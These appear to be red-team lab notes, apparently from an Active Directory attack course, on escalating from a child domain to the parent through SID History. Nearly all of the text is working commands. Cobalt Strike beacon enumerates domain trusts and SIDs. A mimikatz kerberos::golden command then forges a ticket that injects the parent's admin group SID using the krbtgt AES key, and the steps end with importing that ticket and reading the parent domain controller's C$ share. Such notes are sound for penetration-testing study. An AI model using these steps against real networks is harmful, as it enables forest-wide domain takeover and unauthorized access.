Parent/Child
beacon> powershell Get-DomainTrust
beacon> powershell Get-DomainGroup -Identity "Domain Admins" -Domain cyberbotic.io -Properties ObjectSid
beacon> powershell Get-DomainController -Domain cyberbotic.io | select Name
If you have domain admins rights in the parent/child you can also have domain admin rights in the other parent/child through SID History feature.
mimikatz # kerberos::golden /user:Administrator /domain:dev.cyberbotic.io /sid:S-1-5-21-3263068140-2042698922-2891547269 /sids:S-1-5-21-378720957-2217973887-3501892633-512 /aes256:390b2fdb13cc820d73ecf2dadddd4c9d76425d4c2156b89ac551efb9d591a8aa /startoffset:-10 /endin:600 /renewmax:10080 /ticket:cyberbotic.kirbi
Where:
/user
is the username to impersonate./domain
is the current domain./sid
is the current domain SID./sids
is the SID of the target group to add ourselves to./aes256
is the AES256 key of the current domain's krbtgt account./startoffset
sets the start time of the ticket to 10 mins before the current time./endin
sets the expiry date for the ticket to 60 mins./renewmax
sets how long the ticket can be valid for if renewed.
beacon> make_token CYBER\Administrator FakePass
[+] Impersonated DEV\bfarmer
beacon> kerberos_ticket_use C:\Users\Administrator\Desktop\cyberbotic.kirbi
beacon> ls \\dc-1\c$
beacon> rev2self
Last updated